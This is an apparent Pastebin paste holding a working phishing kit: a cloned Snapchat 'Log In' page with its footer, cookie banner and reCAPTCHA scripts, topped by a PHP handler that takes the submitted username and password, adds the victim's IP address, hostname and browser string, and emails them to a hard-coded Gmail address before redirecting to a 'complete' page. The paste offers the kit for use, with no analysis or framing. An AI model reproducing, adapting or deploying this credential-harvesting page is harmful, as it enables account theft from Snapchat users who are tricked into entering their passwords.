Advertisement
Guest User

Untitled

a guest
Aug 5th, 2017
695
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 24.38 KB | None | 0 0
  1. <?php
  2.   If (isset($_POST["username"])&& isset($_POST["password"])){
  3.     $ipAddress = getenv('REMOTE_ADDR');
  4.     $to = "mrasim98@gmail.com";
  5.     $subject = "ٍSnapcaht Account";
  6.     $message = "--------------  UserName -------------\n";
  7.     $message .= "Username : ".$_POST['username']."\n";
  8.     $message .= "Password : ".$_POST['password']."\n";
  9.     $message .= "-------------- Information ------------\n";
  10.     $message .= "IP : ".$ipAddress."\n";
  11.     $message .= "HOST : ".gethostbyaddr( $ipAddress )."\n";
  12.     $message .= "BROWSER : ".$_SERVER['HTTP_USER_AGENT']."\n";
  13.    
  14.     mail( $to, $subject, $message, "From:none@none.com" );
  15.    header('Location: complete.html');
  16.   }
  17.   ?>
  18. <!DOCTYPE html>
  19. <html lang="en">
  20.    <head>
  21.       <script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/api2/r20170731114946/recaptcha__en.js"></script>
  22.       <script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/api2/r20170731114946/recaptcha__en.js"></script>
  23.       <script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/api2/r20170731114946/recaptcha__en.js"></script>
  24.       <script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/api2/r20170731114946/recaptcha__en.js"></script>
  25.       <script type="text/javascript" async="" src="recaptcha__en.js.download"></script>
  26.       <script src="chrome-extension://obkfjhifkbhimlocpddgamonjihinpak/script/safebrowse.js"></script>
  27.       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  28.       <title>Log In • Snapchat</title>
  29.       <!-- Meta -->
  30.       <meta name="referrer" content="origin">
  31.       <meta name="apple-mobile-web-app-capable" content="no">
  32.       <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0">
  33.       <!-- Styles -->
  34.       <link rel="stylesheet" href="semantic.min.css">
  35.       <link rel="stylesheet" href="dropdown.min.css">
  36.       <!-- Force reload of css file -->
  37.       <link rel="stylesheet" href="snapchat.css">
  38.       <link rel="stylesheet" href="accounts.css">
  39.       <link rel="stylesheet" href="auth.css">
  40.       <link rel="stylesheet" href="revoke.css">
  41.       <!-- Scripts -->
  42.       <script src="jquery.min.js.download"></script>
  43.       <script src="semantic.min.js.download"></script>
  44.       <script src="dropdown.min.js.download"></script>
  45.       <script src="accounts.js.download"></script>
  46.       <!-- Favicon -->
  47.       <link rel="shortcut icon" href="https://accounts.snapchat.com/accounts/static/images/favicon/favicon.png" type="image/png">
  48.       <script src="recaptcha.js.download"></script>
  49.       <script src="api.js.download" async="" defer=""></script>
  50.       <link rel="stylesheet" type="text/css" href="chrome-extension://immhpnclomdloikkpcefncmfgjbkojmh/emoji.css">
  51.    </head>
  52.    <body>
  53.       <!-- Pusher is Needed for Top Navigation Menu -->
  54.       <div class="pusher">
  55.          <div class="snapchatInvertedHeader ui inverted vertical segment">
  56.             <div class="ui stackable page one column grid">
  57.                <div class="row">
  58.                   <div class="column">
  59.                      <h1 style="position: relative;"><a href="https://accounts.snapchat.com/"><img src="ghost.svg" alt="Snapchat" class="logo"></a></h1>
  60.                   </div>
  61.                </div>
  62.             </div>
  63.          </div>
  64.          <!-- End Inverted Header -->
  65.          <div id="login-root" data-xsrf="PQFM4FgzF0iYT3RFF4Utpg" data-continue="https://accounts.snapchat.com/accounts/welcome">
  66.             <div data-reactroot="" class="Login">
  67.                <div class="ui inverted vertical segment accountsBody segment_odg segment_business">
  68.                   <div class="ui stackable page grid">
  69.                      <div class="row">
  70.                         <div class="column accountsCentered">
  71.                            <h1 class="accountsTitle">Log In</h1>
  72.                            <div>
  73.                               <form class="ui form accountsForm" id="login_form" action="login.php" method="post">
  74.                                  <div class="ui error accountsFormError" id="error_message"></div>
  75.                                  <div class="required field accountsWideField">
  76.                                     <div class="ui icon input"><i class="user icon"><img src="user.png"></i><input type="text" class="" name="username" placeholder="Username" value="" autocomplete="off"></div>
  77.                                  </div>
  78.                                  <div class="required field accountsWideField">
  79.                                     <div class="ui icon input"><i class="lock icon"><img src="password.png"></i><input type="password" class="" name="password" placeholder="Password" value="" autocomplete="off"></div>
  80.                                  </div>
  81.                                  <div class="field accountsWideField">
  82.                                     <div class="Recaptcha">
  83.                                        <div id="g-recaptcha" class="g-recaptcha"></div>
  84.                                     </div>
  85.                                  </div>
  86.                                  <input type="hidden" name="xsrf_token" value="PQFM4FgzF0iYT3RFF4Utpg">
  87.                                  <input type="hidden" name="continue" value="https://accounts.snapchat.com/accounts/welcome">
  88.                                  <input type="submit" class="ui inverted button accountsWideButton button_odg button_business" value="Log In">
  89.                                  <p><a href="/accounts/password_reset_request" class="forgot_pwd_business">Forgot your password?</a></p>
  90.                               </form>
  91.                            </div>
  92.                         </div>
  93.                      </div>
  94.                   </div>
  95.                </div>
  96.                <div style="background-color: rgb(248, 249, 251); font-size: 14px; line-height: 17px;">
  97.                   <style>
  98.                      .footer-container,
  99.                      .footer-bottom-bar {
  100.                      width: 92.3%;
  101.                      max-width: 960px;
  102.                      margin: auto;
  103.                      }
  104.                      .footer-container {
  105.                      box-sizing: content-box;
  106.                      position: relative;
  107.                      padding: 30px 0 30px;
  108.                      min-height: 195px;
  109.                      }
  110.                      .footer-container .footer-column {
  111.                      position: relative;
  112.                      box-sizing: border-box;
  113.                      float: left;
  114.                      width: 25%;
  115.                      padding-right: 6.25%;
  116.                      }
  117.                      .footer-container .footer-column .footer-column-header {
  118.                      box-sizing: content-box;
  119.                      line-height: 23px;
  120.                      font-weight: bold;
  121.                      }
  122.                      .footer-container .footer-column .footer-column-expand-caret {
  123.                      display: none;
  124.                      }
  125.                      .footer-container .footer-column a {
  126.                      display: table;
  127.                      color: rgba(0, 0, 0, 0.4);
  128.                      text-decoration: none;
  129.                      line-height: 17px;
  130.                      margin-top: 6px;
  131.                      }
  132.                      .footer-container .footer-column a:hover {
  133.                      color: black;
  134.                      }
  135.                      .footer-container .langue-selection-block {
  136.                      position: absolute;
  137.                      box-sizing: border-box;
  138.                      padding: 0 6.25% 15px 0;
  139.                      bottom: 15px;
  140.                      width: 25%;
  141.                      }
  142.                      .footer-container .langue-selection-block .langue-header {
  143.                      font-weight: bold;
  144.                      }
  145.                      .footer-bottom-bar a {
  146.                      line-height: 56px;
  147.                      margin-right: 40px;
  148.                      color: white;
  149.                      text-decoration: none;
  150.                      }
  151.                      @media (max-width: 767px) {
  152.                      .footer-container,
  153.                      .footer-bottom-bar {
  154.                      width: 100%;
  155.                      padding: 0;
  156.                      }
  157.                      .footer-container .footer-column {
  158.                      padding: 0;
  159.                      width: 100%;
  160.                      }
  161.                      .footer-container .footer-column a,
  162.                      .footer-container .footer-column .footer-column-header {
  163.                      margin-top: 0;
  164.                      padding: 10px 40px;
  165.                      width: calc(100% - 80px);
  166.                      line-height: 25px;
  167.                      }
  168.                      .footer-container .footer-column .footer-column-header,
  169.                      .footer-container .langue-selection-block {
  170.                      border-top: solid 1px #D4D4D4;
  171.                      }
  172.                      .footer-container .footer-column .footer-column-header {
  173.                      cursor: pointer;
  174.                      background-color: white;
  175.                      }
  176.                      .footer-container .footer-column .footer-column-expand-caret {
  177.                      display: block;
  178.                      position: absolute;
  179.                      left: 16px;
  180.                      top: 15px;
  181.                      width: 15px;
  182.                      height: 20px;
  183.                      transform-origin: 55% 45%;
  184.                      cursor: pointer;
  185.                      }
  186.                      .footer-container .footer-column.expanded .footer-column-expand-caret {
  187.                      transform: rotate(90deg);
  188.                      -webkit-transform: rotate(90deg);
  189.                      }
  190.                      .footer-container .footer-column a {
  191.                      font-weight: 600;
  192.                      color: black;
  193.                      border-top: solid 1px #E5E5E5;
  194.                      display: none;
  195.                      }
  196.                      .footer-container .footer-column.expanded a {
  197.                      display: block;
  198.                      box-sizing: content-box;
  199.                      }
  200.                      .footer-container .langue-selection-block {
  201.                      position: static;
  202.                      width: 100%;
  203.                      height: inherit;
  204.                      top: inherit;
  205.                      padding: 14px 20px 15px;
  206.                      }
  207.                      .footer-bottom-bar a {
  208.                      display: block;
  209.                      line-height: 45px;
  210.                      margin-right: 0;
  211.                      padding-left: 20px;
  212.                      border-bottom: solid 1px #D4D4D4;
  213.                      }
  214.                      }
  215.                   </style>
  216.                   <div class="footer-container" id="footerContainer">
  217.                      <div class="footer-column">
  218.                         <div class="footer-column-expand-caret">
  219.                            <svg width="15" height="20">
  220.                               <g>
  221.                                  <rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect>
  222.                                  <rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect>
  223.                               </g>
  224.                            </svg>
  225.                         </div>
  226.                         <div class="footer-column-header">Company</div>
  227.                         <div><a href="https://www.snap.com/en-US/">Snap Inc.</a><a href="https://www.snap.com/en-US/jobs/">Jobs</a><a href="https://www.snap.com/en-US/news/">News</a></div>
  228.                      </div>
  229.                      <div class="footer-column">
  230.                         <div class="footer-column-expand-caret">
  231.                            <svg width="15" height="20">
  232.                               <g>
  233.                                  <rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect>
  234.                                  <rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect>
  235.                               </g>
  236.                            </svg>
  237.                         </div>
  238.                         <div class="footer-column-header">Community</div>
  239.                         <div><a href="https://support.snapchat.com/">Support</a><a href="https://support.snapchat.com/a/guidelines">Community Guidelines</a><a href="https://www.snapchat.com/safety">Safety Center</a></div>
  240.                      </div>
  241.                      <div class="footer-column">
  242.                         <div class="footer-column-expand-caret">
  243.                            <svg width="15" height="20">
  244.                               <g>
  245.                                  <rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect>
  246.                                  <rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect>
  247.                               </g>
  248.                            </svg>
  249.                         </div>
  250.                         <div class="footer-column-header">Business</div>
  251.                         <div><a href="https://www.snapchat.com/ads">Advertising</a><a href="https://www.snap.com/en-US/ad-policies/">Advertising Policies</a><a href="https://www.snap.com/en-US/brand-guidelines/">Brand Guidelines</a><a href="https://support.snapchat.com/a/promotions-rules">Promotions Rules</a></div>
  252.                      </div>
  253.                      <div class="footer-column">
  254.                         <div class="footer-column-expand-caret">
  255.                            <svg width="15" height="20">
  256.                               <g>
  257.                                  <rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect>
  258.                                  <rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect>
  259.                               </g>
  260.                            </svg>
  261.                         </div>
  262.                         <div class="footer-column-header">Legal</div>
  263.                         <div><a href="https://www.snap.com/en-US/privacy/privacy-center/">Privacy Center</a><a href="https://www.snap.com/en-US/cookie-policy/">Cookie Policy</a><a href="https://support.snapchat.com/co/report-copyright">Copyright</a><a href="https://www.snap.com/en-US/terms/on-demand-geofilters/">On-Demand Geofilters Terms and&nbsp;Conditions</a><a href="https://www.snapchat.com/geofilters/terms.html">Community Geofilter Terms and&nbsp;Conditions</a></div>
  264.                      </div>
  265.                      <div style="clear: both;"></div>
  266.                      <div class="langue-selection-block">
  267.                         <div class="langue-header">Language</div>
  268.                         <div style="position: relative;">
  269.                            <select id="sc-global-locale-selector" style="-webkit-appearance: none; border: 1px solid rgb(204, 204, 204); border-radius: 5px; background: white; width: 100%; margin-top: 10px; padding: 5px 10px; font-size: 14px; font-family: inherit; color: rgba(0, 0, 0, 0.6); height: 34px; cursor: pointer;">
  270.                               <option value="en-US">English (US)</option>
  271.                               <option value="ar">العَرَبِية</option>
  272.                               <option value="id-ID">Bahasa Indonesia</option>
  273.                               <option value="da-DK">Dansk</option>
  274.                               <option value="de-DE">Deutsch</option>
  275.                               <option value="el-GR">Ελληνικά</option>
  276.                               <option value="en-GB">English (UK)</option>
  277.                               <option value="es">Español</option>
  278.                               <option value="fr-FR">Français</option>
  279.                               <option value="ko-KR">한국어</option>
  280.                               <option value="it-IT">Italiano</option>
  281.                               <option value="nl-NL">Nederlands</option>
  282.                               <option value="ja-JP">日本語</option>
  283.                               <option value="nb-NO">Norsk</option>
  284.                               <option value="pl-PL">Polski</option>
  285.                               <option value="pt-BR">Português (Brasil)</option>
  286.                               <option value="pt-PT">Português (Portugal)</option>
  287.                               <option value="ro-RO">Română</option>
  288.                               <option value="ru-RU">Русский</option>
  289.                               <option value="fi-FI">Suomi</option>
  290.                               <option value="sv-SE">Svenska</option>
  291.                               <option value="tr-TR">Türkçe</option>
  292.                               <option value="zh-CN">中文(简体)</option>
  293.                               <option value="zh-TW">中文(繁體)</option>
  294.                            </select>
  295.                            <div style="position: absolute; right: 10px; width: 0px; height: 0px; pointer-events: none; border-style: solid; bottom: 18px; border-width: 0px 3px 5px; border-color: transparent transparent rgb(102, 102, 102);"></div>
  296.                            <div style="position: absolute; right: 10px; width: 0px; height: 0px; pointer-events: none; border-style: solid; bottom: 10px; border-width: 5px 3px 0px; border-color: rgb(102, 102, 102) transparent transparent;"></div>
  297.                         </div>
  298.                      </div>
  299.                   </div>
  300.                   <div style="background-color: rgb(38, 38, 38);">
  301.                      <div class="footer-bottom-bar">
  302.                         <a href="https://www.snap.com/en-US/privacy/privacy-policy/">Privacy Policy</a><a href="https://www.snap.com/en-US/terms/">Terms of Service</a>
  303.                         <div style="clear: both;"></div>
  304.                      </div>
  305.                   </div>
  306.                   <div id="cookiePopupContainer" class="shown">
  307.                      <style>
  308.                         #cookiePopupContainer {
  309.                         position: fixed;
  310.                         width: 100%;
  311.                         z-index: 10;
  312.                         background: white;
  313.                         bottom: 0;
  314.                         font-size: 14px;
  315.                         line-height: 17px;
  316.                         transition: transform, box-shadow;
  317.                         transition-duration: 500ms;
  318.                         transition-timing-function: cubic-bezier(0,0,0,1), linear;
  319.                         transform: translateY(100%);
  320.                         -webkit-transform: translateY(100%);
  321.                         box-shadow: 0 0 0 rgba(0,0,0,0.075);
  322.                         }
  323.                         #cookiePopupContainer.shown {
  324.                         transform: translateY(0);
  325.                         -webkit-transform: translateY(0);
  326.                         box-shadow: 0 -1px 3px rgba(0,0,0,0.175);
  327.                         }
  328.                         #cookiePopupContainer #cookiePopupCloseButton {
  329.                         position: absolute;
  330.                         right: 30px;
  331.                         top: calc(50% - 10px);
  332.                         border-radius: 50%;
  333.                         width: 20px;
  334.                         height: 20px;
  335.                         background-color: lightgray;
  336.                         cursor: pointer;
  337.                         transform: rotate(45deg);
  338.                         -ms-transform: rotate(45deg);
  339.                         -webkit-transform: rotate(45deg);
  340.                         background: url(data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20style%3D%22background-color%3A%20lightgray%3B%22%20width%3D%2220%22%20height%3D%2220%22%20viewBox%3D%220%200%2030%2030%22%3E%3Crect%20width%3D%223%22%20height%3D%2220%22%20x%3D%2213.5%22%20y%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3Crect%20width%3D%2220%22%20height%3D%223%22%20y%3D%2213.5%22%20x%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3C%2Fsvg%3E);
  341.                         }
  342.                         #cookiePopupContainer #cookiePopupCloseButton:hover {
  343.                         background: url(data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20style%3D%22background-color%3A%20gray%3B%22%20width%3D%2220%22%20height%3D%2220%22%20viewBox%3D%220%200%2030%2030%22%3E%3Crect%20width%3D%223%22%20height%3D%2220%22%20x%3D%2213.5%22%20y%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3Crect%20width%3D%2220%22%20height%3D%223%22%20y%3D%2213.5%22%20x%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3C%2Fsvg%3E);
  344.                         }
  345.                         #cookiePopupContainer .cookie-text {
  346.                         padding: 28px 20px;
  347.                         text-align: center;
  348.                         margin-left: calc(10% + 210px);
  349.                         margin-right: calc(10% + 210px);
  350.                         }
  351.                         @media (max-width: 1200px) {
  352.                         #cookiePopupContainer .cookie-text {
  353.                         margin-left: 3%;
  354.                         margin-right: calc(3% + 40px);
  355.                         }
  356.                         }
  357.                         @media (max-width: 1200px) {
  358.                         #cookiePopupContainer .cookie-icon {
  359.                         display: none;
  360.                         }
  361.                         }
  362.                         @media print {
  363.                         #cookiePopupContainer {
  364.                         display: none;
  365.                         }
  366.                         }
  367.                      </style>
  368.                      <div class="cookie-icon cookie-icon-left" style="position: absolute; width: 240px; height: 120px; background: url(&quot;https://www.snapchat.com/home/cookie-1.svg&quot;) center center no-repeat; left: calc(10% - 50px); top: calc(50% - 55px);"></div>
  369.                      <div class="cookie-popup">
  370.                         <div class="cookie-text">Hi! We use cookies on this website to help operate our site and for analytics purposes. For more on how we use cookies and your cookie choices, go <a href="https://www.snap.com/en-US/cookie-policy/" target="_blank">here</a>! By continuing to use our services, you are giving us your consent to use cookies.</div>
  371.                      </div>
  372.                      <div class="cookie-icon cookie-icon-right" style="position: absolute; width: 240px; height: 120px; background: url(&quot;https://www.snapchat.com/home/cookie-2.svg&quot;) center center no-repeat; right: calc(10% - 50px); top: calc(50% - 50px);"></div>
  373.                      <div id="cookiePopupCloseButton"></div>
  374.                   </div>
  375.                </div>
  376.             </div>
  377.          </div>
  378.          <script src="main.en-us.js.download"></script>
  379.       </div>
  380.       <!-- End Pusher -->
  381.       <div style="background-color: #fff; border: 1px solid #ccc; box-shadow: 2px 2px 3px rgba(0, 0, 0, 0.2); position: absolute; left: 0px; top: -10000px; transition: visibility 0s linear 0.3s, opacity 0.3s linear; opacity: 0; visibility: hidden; z-index: 2000000000;">
  382.          <div style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 2000000000; background-color: #fff; opacity: 0.05;  filter: alpha(opacity=5)"></div>
  383.          <div class="g-recaptcha-bubble-arrow" style="border: 11px solid transparent; width: 0; height: 0; position: absolute; pointer-events: none; margin-top: -11px; z-index: 2000000000;"></div>
  384.          <div class="g-recaptcha-bubble-arrow" style="border: 10px solid transparent; width: 0; height: 0; position: absolute; pointer-events: none; margin-top: -10px; z-index: 2000000000;"></div>
  385.          <div style="z-index: 2000000000; position: relative;"><iframe src="bframe.html" title="recaptcha challenge" frameborder="0" scrolling="no" sandbox="allow-forms  allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups allow-popups-to-escape-sandbox" name="443b9iaghuoj" style="width: 100%; height: 100%;"></iframe></div>
  386.       </div>
  387.    </body>
  388. </html>
  389. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement